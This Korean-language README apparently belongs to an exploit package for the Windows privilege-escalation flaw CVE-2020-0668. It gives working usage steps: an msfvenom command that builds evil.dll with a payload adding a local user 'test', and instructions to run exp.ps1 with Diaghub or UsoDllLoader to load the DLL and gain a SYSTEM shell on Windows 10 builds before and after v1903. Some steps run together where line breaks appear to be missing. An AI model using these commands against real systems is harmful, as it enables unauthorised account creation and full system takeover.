
CVE-2020-0668 익스플로잇이 win10 v1903 미만 버전 및 win10 v1903 이상 버전에서 작동하도록 만듭니다.
CVE-2020-0668 익스플로잇이 win10 v1903 미만 버전과 win10 v1903 이상 버전에서 작동하도록 만들기
powershell 익스플로잇은 Diaghub와 함께 win10 v1903 미만 버전에서 작동합니다.
evil.dll 생성
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 실행Diaghub.exe C:\ProgramData evil.dll을 실행하여 dll을 로드하고 사용자를 추가합니다.
powershell 익스플로잇은 UsoDllLoader와 함께 win10 v1903 이상 버전에서 작동합니다.
exp.ps1 실행UsoDllLoader.exe를 실행하여 시스템 셸을 획득
SysTracingPoc의 x86 릴리스 버전으로, issue를 위한 것입니다. UsoLoadDll 덕분에 익스플로잇은 win10 v1903 이상 버전에서 작동합니다.
.NET 기반 PoC입니다. C:\Windows\System32\evil.dll을 확인하고 evil.txt로 이름을 바꾸면 dll 파일이 아니라 추적 로그만 들어 있음을 알 수 있습니다.
powershell 기반 PoC입니다. 역시 evil.dll에는 추적 로그만 들어 있습니다.